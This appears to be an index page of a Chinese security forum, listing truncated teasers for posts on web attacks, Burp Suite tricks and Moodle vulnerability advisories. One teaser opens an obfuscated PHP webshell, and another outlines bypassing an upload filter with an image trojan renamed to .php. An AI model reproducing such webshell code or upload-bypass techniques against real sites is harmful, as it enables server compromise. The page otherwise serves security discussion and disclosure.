神兵利刃 便捷的业务规则桌面工具:WebSphere ILOG Rule Solutions for Office(RSO) 引言 随着现代商业策略越来越复杂 , 庞大 , 以及可能出现的策略快速变更的需求 , 商业规则管理系统 (BRMS) 也就应运而生。 在商业规则管理系统中 , 商业策略以业务规则的形式来表述 , ... 06月16日 960 次浏览 发表评论 阅读全文
神兵利刃 一个恶心的shell <?php ${"\x47\x4cO\x42\x41L\x53"}="\x66\x75\x6ec"; ${"\x47\x4c\x4f\... 06月13日 809 次浏览 发表评论 阅读全文
神兵利刃 分享一个小技巧,Burp修改response欺骗 上次看到某同学在问,很多人都说用fiddler 在drops里面的burp教程也是一笔带过,没有很好的实例。 这里就说一下,很多网站,在做验证的时候,是基于js的验证,判断浏览器返... 06月13日 1,134 次浏览 发表评论 阅读全文
网络安全 一个上传的问题:linux+ngnix+php 做测试,linux+ngnix+php,只有一个上传的功能,而且限定 ,无法直接上传脚本文件,会提示,图片非法,使用图片马,burp抓包该后缀为.php,可以上传成功,由此可以判定是可以进行... 06月13日 975 次浏览 发表评论 阅读全文
网络安全 论一个冷门却有潜力的WEB攻击手法:第三方安全威胁 外部调用JS/CSS来实现WEB渗透 前言:大家都知道,现在入侵方法很多,比如SQL XSS CSRF 等等。而我今天要介绍的是一个比较冷门的渗透手法,准确的说,他不属于本站的安全漏洞,他的... 06月12日 819 次浏览 发表评论 阅读全文
风土人情 这。。。。。算漏洞吗?怎么利用? 1#SinCoder | 2014-06-11 17:49打码不够专业啊 2#cddevils | 2014-06-11 17:55这马赛克打的。。。。 3#Vigoss_Z | ... 06月12日 871 次浏览 发表评论 阅读全文
各位牛牛们想想这段代码可否有可乘之机! post提交的内容为: POST /xxx/admin/login/login_check.php?langset=cn HTTP/1.1 Accept: text/html, a... 06月12日 网络安全 955 次浏览 发表评论 阅读全文
javascript技巧合集 事件源对象 event.srcElement.tagName event.srcElement.type捕获释放 event.srcElement.setCapture(... 06月12日 编程茶楼 1,375 次浏览 发表评论 阅读全文
Moodle 会话劫持漏洞 受影响系统:Moodle Moodle 2.x描述:-------------------------------------------------------------------... 06月11日 业界关注 1,342 次浏览 发表评论 阅读全文
Moodle My Home信息泄露漏洞 受影响系统:Moodle Moodle 2.x描述:--------------------------------------------------------------------------... 06月11日 WEB安全 884 次浏览 发表评论 阅读全文